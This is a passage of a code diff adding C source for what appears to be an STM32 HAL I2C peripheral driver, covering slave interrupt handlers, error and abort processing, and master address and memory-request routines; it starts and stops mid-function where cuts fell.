+ + /* Set state at HAL_I2C_STATE_LISTEN */ + hi2c->PreviousState = I2C_STATE_SLAVE_BUSY_TX; + hi2c->State = HAL_I2C_STATE_LISTEN; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->SlaveTxCpltCallback(hi2c); +#else + HAL_I2C_SlaveTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief Handle BTF flag for Slave transmitter + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_SlaveTransmit_BTF(I2C_HandleTypeDef *hi2c) +{ + if (hi2c->XferCount != 0U) + { + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } +} + +/** + * @brief Handle RXNE flag for Slave + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_SlaveReceive_RXNE(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + + if (hi2c->XferCount != 0U) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + + if ((hi2c->XferCount == 0U) && (CurrentState == HAL_I2C_STATE_BUSY_RX_LISTEN)) + { + /* Last Byte is received, disable Interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_BUF); + + /* Set state at HAL_I2C_STATE_LISTEN */ + hi2c->PreviousState = I2C_STATE_SLAVE_BUSY_RX; + hi2c->State = HAL_I2C_STATE_LISTEN; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->SlaveRxCpltCallback(hi2c); +#else + HAL_I2C_SlaveRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief Handle BTF flag for Slave receiver + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_SlaveReceive_BTF(I2C_HandleTypeDef *hi2c) +{ + if (hi2c->XferCount != 0U) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } +} + +/** + * @brief Handle ADD flag for Slave + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @param IT2Flags Interrupt2 flags to handle. + * @retval None + */ +static void I2C_Slave_ADDR(I2C_HandleTypeDef *hi2c, uint32_t IT2Flags) +{ + uint8_t TransferDirection = I2C_DIRECTION_RECEIVE; + uint16_t SlaveAddrCode; + + if (((uint32_t)hi2c->State & (uint32_t)HAL_I2C_STATE_LISTEN) == (uint32_t)HAL_I2C_STATE_LISTEN) + { + /* Disable BUF interrupt, BUF enabling is manage through slave specific interface */ + __HAL_I2C_DISABLE_IT(hi2c, (I2C_IT_BUF)); + + /* Transfer Direction requested by Master */ + if (I2C_CHECK_FLAG(IT2Flags, I2C_FLAG_TRA) == RESET) + { + TransferDirection = I2C_DIRECTION_TRANSMIT; + } + + if (I2C_CHECK_FLAG(IT2Flags, I2C_FLAG_DUALF) == RESET) + { + SlaveAddrCode = (uint16_t)hi2c->Init.OwnAddress1; + } + else + { + SlaveAddrCode = (uint16_t)hi2c->Init.OwnAddress2; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Call Slave Addr callback */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->AddrCallback(hi2c, TransferDirection, SlaveAddrCode); +#else + HAL_I2C_AddrCallback(hi2c, TransferDirection, SlaveAddrCode); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + } +} + +/** + * @brief Handle STOPF flag for Slave + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_Slave_STOPF(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Clear STOPF flag */ + __HAL_I2C_CLEAR_STOPFLAG(hi2c); + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* If a DMA is ongoing, Update handle size context */ + if ((hi2c->Instance->CR2 & I2C_CR2_DMAEN) == I2C_CR2_DMAEN) + { + if ((CurrentState == HAL_I2C_STATE_BUSY_RX) || (CurrentState == HAL_I2C_STATE_BUSY_RX_LISTEN)) + { + hi2c->XferCount = (uint16_t)(__HAL_DMA_GET_COUNTER(hi2c->hdmarx)); + + if (hi2c->XferCount != 0U) + { + /* Set ErrorCode corresponding to a Non-Acknowledge */ + hi2c->ErrorCode |= HAL_I2C_ERROR_AF; + } + + /* Disable, stop the current DMA */ + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + /* Abort DMA Xfer if any */ + if (HAL_DMA_GetState(hi2c->hdmarx) != HAL_DMA_STATE_READY) + { + /* Set the I2C DMA Abort callback : + will lead to call HAL_I2C_ErrorCallback() at end of DMA abort procedure */ + hi2c->hdmarx->XferAbortCallback = I2C_DMAAbort; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hi2c->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hi2c->hdmarx->XferAbortCallback(hi2c->hdmarx); + } + } + } + else + { + hi2c->XferCount = (uint16_t)(__HAL_DMA_GET_COUNTER(hi2c->hdmatx)); + + if (hi2c->XferCount != 0U) + { + /* Set ErrorCode corresponding to a Non-Acknowledge */ + hi2c->ErrorCode |= HAL_I2C_ERROR_AF; + } + + /* Disable, stop the current DMA */ + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + /* Abort DMA Xfer if any */ + if (HAL_DMA_GetState(hi2c->hdmatx) != HAL_DMA_STATE_READY) + { + /* Set the I2C DMA Abort callback : + will lead to call HAL_I2C_ErrorCallback() at end of DMA abort procedure */ + hi2c->hdmatx->XferAbortCallback = I2C_DMAAbort; + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hi2c->hdmatx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hi2c->hdmatx->XferAbortCallback(hi2c->hdmatx); + } + } + } + } + + /* All data are not transferred, so set error code accordingly */ + if (hi2c->XferCount != 0U) + { + /* Store Last receive data if any */ + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BTF) == SET) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } + + /* Store Last receive data if any */ + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_RXNE) == SET) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } + + if (hi2c->XferCount != 0U) + { + /* Set ErrorCode corresponding to a Non-Acknowledge */ + hi2c->ErrorCode |= HAL_I2C_ERROR_AF; + } + } + + if (hi2c->ErrorCode != HAL_I2C_ERROR_NONE) + { + /* Call the corresponding callback to inform upper layer of End of Transfer */ + I2C_ITError(hi2c); + } + else + { + if (CurrentState == HAL_I2C_STATE_BUSY_RX_LISTEN) + { + /* Set state at HAL_I2C_STATE_LISTEN */ + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_LISTEN; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->SlaveRxCpltCallback(hi2c); +#else + HAL_I2C_SlaveRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + + if (hi2c->State == HAL_I2C_STATE_LISTEN) + { + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->ListenCpltCallback(hi2c); +#else + HAL_I2C_ListenCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + if ((hi2c->PreviousState == I2C_STATE_SLAVE_BUSY_RX) || (CurrentState == HAL_I2C_STATE_BUSY_RX)) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->SlaveRxCpltCallback(hi2c); +#else + HAL_I2C_SlaveRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } + } +} + +/** + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_Slave_AF(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + uint32_t CurrentXferOptions = hi2c->XferOptions; + + if (((CurrentXferOptions == I2C_FIRST_AND_LAST_FRAME) || (CurrentXferOptions == I2C_LAST_FRAME)) && \ + (CurrentState == HAL_I2C_STATE_LISTEN)) + { + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Clear AF flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_AF); + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->ListenCpltCallback(hi2c); +#else + HAL_I2C_ListenCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else if (CurrentState == HAL_I2C_STATE_BUSY_TX) + { + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->PreviousState = I2C_STATE_SLAVE_BUSY_TX; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Clear AF flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_AF); + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->SlaveTxCpltCallback(hi2c); +#else + HAL_I2C_SlaveTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + /* Clear AF flag only */ + /* State Listen, but XferOptions == FIRST or NEXT */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_AF); + } +} + +/** + * @brief I2C interrupts error process + * @param hi2c I2C handle. + * @retval None + */ +static void I2C_ITError(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + HAL_I2C_ModeTypeDef CurrentMode = hi2c->Mode; + uint32_t CurrentError; + + if (((CurrentMode == HAL_I2C_MODE_MASTER) || (CurrentMode == HAL_I2C_MODE_MEM)) && (CurrentState == HAL_I2C_STATE_BUSY_RX)) + { + /* Disable Pos bit in I2C CR1 when error occurred in Master/Mem Receive IT Process */ + hi2c->Instance->CR1 &= ~I2C_CR1_POS; + } + + if (((uint32_t)CurrentState & (uint32_t)HAL_I2C_STATE_LISTEN) == (uint32_t)HAL_I2C_STATE_LISTEN) + { + /* keep HAL_I2C_STATE_LISTEN */ + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_LISTEN; + } + else + { + /* If state is an abort treatment on going, don't change state */ + /* This change will be do later */ + if ((READ_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN) != I2C_CR2_DMAEN) && (CurrentState != HAL_I2C_STATE_ABORT)) + { + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + } + hi2c->PreviousState = I2C_STATE_NONE; + } + + /* Abort DMA transfer */ + if (READ_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN) == I2C_CR2_DMAEN) + { + hi2c->Instance->CR2 &= ~I2C_CR2_DMAEN; + + if (hi2c->hdmatx->State != HAL_DMA_STATE_READY) + { + /* Set the DMA Abort callback : + will lead to call HAL_I2C_ErrorCallback() at end of DMA abort procedure */ + hi2c->hdmatx->XferAbortCallback = I2C_DMAAbort; + + if (HAL_DMA_Abort_IT(hi2c->hdmatx) != HAL_OK) + { + /* Disable I2C peripheral to prevent dummy data in buffer */ + __HAL_I2C_DISABLE(hi2c); + + hi2c->State = HAL_I2C_STATE_READY; + + /* Call Directly XferAbortCallback function in case of error */ + hi2c->hdmatx->XferAbortCallback(hi2c->hdmatx); + } + } + else + { + /* Set the DMA Abort callback : + will lead to call HAL_I2C_ErrorCallback() at end of DMA abort procedure */ + hi2c->hdmarx->XferAbortCallback = I2C_DMAAbort; + + if (HAL_DMA_Abort_IT(hi2c->hdmarx) != HAL_OK) + { + /* Store Last receive data if any */ + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_RXNE) == SET) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + } + + /* Disable I2C peripheral to prevent dummy data in buffer */ + __HAL_I2C_DISABLE(hi2c); + + hi2c->State = HAL_I2C_STATE_READY; + + /* Call Directly hi2c->hdmarx->XferAbortCallback function in case of error */ + hi2c->hdmarx->XferAbortCallback(hi2c->hdmarx); + } + } + } + else if (hi2c->State == HAL_I2C_STATE_ABORT) + { + hi2c->State = HAL_I2C_STATE_READY; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Store Last receive data if any */ + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_RXNE) == SET) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + } + + /* Disable I2C peripheral to prevent dummy data in buffer */ + __HAL_I2C_DISABLE(hi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->AbortCpltCallback(hi2c); +#else + HAL_I2C_AbortCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + /* Store Last receive data if any */ + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_RXNE) == SET) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + } + + /* Call user error callback */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->ErrorCallback(hi2c); +#else + HAL_I2C_ErrorCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + + /* STOP Flag is not set after a NACK reception, BusError, ArbitrationLost, OverRun */ + CurrentError = hi2c->ErrorCode; + + if (((CurrentError & HAL_I2C_ERROR_BERR) == HAL_I2C_ERROR_BERR) || \ + ((CurrentError & HAL_I2C_ERROR_ARLO) == HAL_I2C_ERROR_ARLO) || \ + ((CurrentError & HAL_I2C_ERROR_AF) == HAL_I2C_ERROR_AF) || \ + ((CurrentError & HAL_I2C_ERROR_OVR) == HAL_I2C_ERROR_OVR)) + { + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + } + + /* So may inform upper layer that listen phase is stopped */ + /* during NACK error treatment */ + CurrentState = hi2c->State; + if (((hi2c->ErrorCode & HAL_I2C_ERROR_AF) == HAL_I2C_ERROR_AF) && (CurrentState == HAL_I2C_STATE_LISTEN)) + { + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->ListenCpltCallback(hi2c); +#else + HAL_I2C_ListenCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } +} + +/** + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_MasterRequestWrite(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint32_t Timeout, uint32_t Tickstart) +{ + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + uint32_t CurrentXferOptions = hi2c->XferOptions; + + /* Generate Start condition if first transfer */ + if ((CurrentXferOptions == I2C_FIRST_AND_LAST_FRAME) || (CurrentXferOptions == I2C_FIRST_FRAME) || (CurrentXferOptions == I2C_NO_OPTION_FRAME)) + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + else if (hi2c->PreviousState == I2C_STATE_MASTER_BUSY_RX) + { + /* Generate ReStart */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + else + { + /* Do nothing */ + } + + /* Wait until SB flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_SB, RESET, Timeout, Tickstart) != HAL_OK) + { + if (READ_BIT(hi2c->Instance->CR1, I2C_CR1_START) == I2C_CR1_START) + { + hi2c->ErrorCode = HAL_I2C_WRONG_START; + } + return HAL_TIMEOUT; + } + + if (hi2c->Init.AddressingMode == I2C_ADDRESSINGMODE_7BIT) + { + /* Send slave address */ + hi2c->Instance->DR = I2C_7BIT_ADD_WRITE(DevAddress); + } + else + { + /* Send header of slave address */ + hi2c->Instance->DR = I2C_10BIT_HEADER_WRITE(DevAddress); + + /* Wait until ADD10 flag is set */ + if (I2C_WaitOnMasterAddressFlagUntilTimeout(hi2c, I2C_FLAG_ADD10, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Send slave address */ + hi2c->Instance->DR = I2C_10BIT_ADDRESS(DevAddress); + } + + /* Wait until ADDR flag is set */ + if (I2C_WaitOnMasterAddressFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief Master sends target device address for read request. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_MasterRequestRead(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint32_t Timeout, uint32_t Tickstart) +{ + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + uint32_t CurrentXferOptions = hi2c->XferOptions; + + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start condition if first transfer */ + if ((CurrentXferOptions == I2C_FIRST_AND_LAST_FRAME) || (CurrentXferOptions == I2C_FIRST_FRAME) || (CurrentXferOptions == I2C_NO_OPTION_FRAME)) + { + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + else if (hi2c->PreviousState == I2C_STATE_MASTER_BUSY_TX) + { + /* Generate ReStart */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + else + { + /* Do nothing */ + } + + /* Wait until SB flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_SB, RESET, Timeout, Tickstart) != HAL_OK) + { + if (READ_BIT(hi2c->Instance->CR1, I2C_CR1_START) == I2C_CR1_START) + { + hi2c->ErrorCode = HAL_I2C_WRONG_START; + } + return HAL_TIMEOUT; + } + + if (hi2c->Init.AddressingMode == I2C_ADDRESSINGMODE_7BIT) + { + /* Send slave address */ + hi2c->Instance->DR = I2C_7BIT_ADD_READ(DevAddress); + } + else + { + /* Send header of slave address */ + hi2c->Instance->DR = I2C_10BIT_HEADER_WRITE(DevAddress); + + /* Wait until ADD10 flag is set */ + if (I2C_WaitOnMasterAddressFlagUntilTimeout(hi2c, I2C_FLAG_ADD10, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Send slave address */ + hi2c->Instance->DR = I2C_10BIT_ADDRESS(DevAddress); + + /* Wait until ADDR flag is set */ + if (I2C_WaitOnMasterAddressFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Restart */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Wait until SB flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_SB, RESET, Timeout, Tickstart) != HAL_OK) + { + if (READ_BIT(hi2c->Instance->CR1, I2C_CR1_START) == I2C_CR1_START) + { + hi2c->ErrorCode = HAL_I2C_WRONG_START; + } + return HAL_TIMEOUT; + } + + /* Send header of slave address */ + hi2c->Instance->DR = I2C_10BIT_HEADER_READ(DevAddress); + } + + /* Wait until ADDR flag is set */ + if (I2C_WaitOnMasterAddressFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief Master sends target device address followed by internal memory address for write request. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_RequestMemoryWrite(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint32_t Timeout, uint32_t Tickstart) +{ + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Wait until SB flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_SB, RESET, Timeout, Tickstart) != HAL_OK) + { + if (READ_BIT(hi2c->Instance->CR1, I2C_CR1_START) == I2C_CR1_START) + { + hi2c->ErrorCode = HAL_I2C_WRONG_START; + } + return HAL_TIMEOUT; + } + + /* Send slave address */ + hi2c->Instance->DR = I2C_7BIT_ADD_WRITE(DevAddress); + + /* Wait until ADDR flag is set */ + if (I2C_WaitOnMasterAddressFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Wait until TXE flag is set */ + if (I2C_WaitOnTXEFlagUntilTimeout(hi2c, Timeout, Tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + + /* If Memory address size is 8Bit */ + if (MemAddSize == I2C_MEMADD_SIZE_8BIT) + { + /* Send Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_LSB(MemAddress); + } + /* If Memory address size is 16Bit */ + else + { + /* Send MSB of Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_MSB(MemAddress); + + /* Wait until TXE flag is set */ + if (I2C_WaitOnTXEFlagUntilTimeout(hi2c, Timeout, Tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + + /* Send LSB of Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_LSB(MemAddress); + } + + return HAL_OK; +} + +/** + * @brief Master sends target device address followed by internal memory address for read request. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_RequestMemoryRead(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint32_t Timeout, uint32_t Tickstart) +{ + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Wait until SB flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_SB, RESET, Timeout, Tickstart) != HAL_OK) + { + if (READ_BIT(hi2c->Instance->CR1, I2C_CR1_START) == I2C_CR1_START) + { + hi2c->ErrorCode = HAL_I2C_WRONG_START; + } + return HAL_TIMEOUT; + } + + /* Send slave address */ + hi2c->Instance->DR = I2C_7BIT_ADD_WRITE(DevAddress); + + /* Wait until ADDR flag is set */ + if (I2C_WaitOnMasterAddressFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Wait until TXE flag is set */ + if (I2C_WaitOnTXEFlagUntilTimeout(hi2c, Timeout, Tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + + /* If Memory address size is 8Bit */ + if (MemAddSize == I2C_MEMADD_SIZE_8BIT) + { + /* Send Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_LSB(MemAddress); + } + /* If Memory address size is 16Bit */ + else + { + /* Send MSB of Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_MSB(MemAddress); + + /* Wait until TXE flag is set */ + if (I2C_WaitOnTXEFlagUntilTimeout(hi2c, Timeout, Tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + + /* Send LSB of Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_LSB(MemAddress); + } + + /* Wait until TXE flag is set */ + if (I2C_WaitOnTXEFlagUntilTimeout(hi2c, Timeout, Tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + + /* Generate Restart */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Wait until SB flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_SB, RESET, Timeout, Tickstart) != HAL_OK) + { + if (READ_BIT(hi2c->Instance->CR1, I2C_CR1_START) == I2C_CR1_START) + { + hi2c->ErrorCode = HAL_I2C_WRONG_START; + } + return HAL_TIMEOUT; + } + + /* Send slave address */ + hi2c->Instance->DR = I2C_7BIT_ADD_READ(DevAddress); + + /* Wait until ADDR flag is set */ + if (I2C_WaitOnMasterAddressFlagUntilTimeout(hi2c, I2C_FLAG_ADDR, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief DMA I2C process complete callback. + * @param hdma DMA handle + * @retval None + */ +static void I2C_DMAXferCplt(DMA_HandleTypeDef *hdma) +{ + I2C_HandleTypeDef *hi2c = (I2C_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; /* Derogation MISRAC2012-Rule-11.5 */ + + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + HAL_I2C_ModeTypeDef 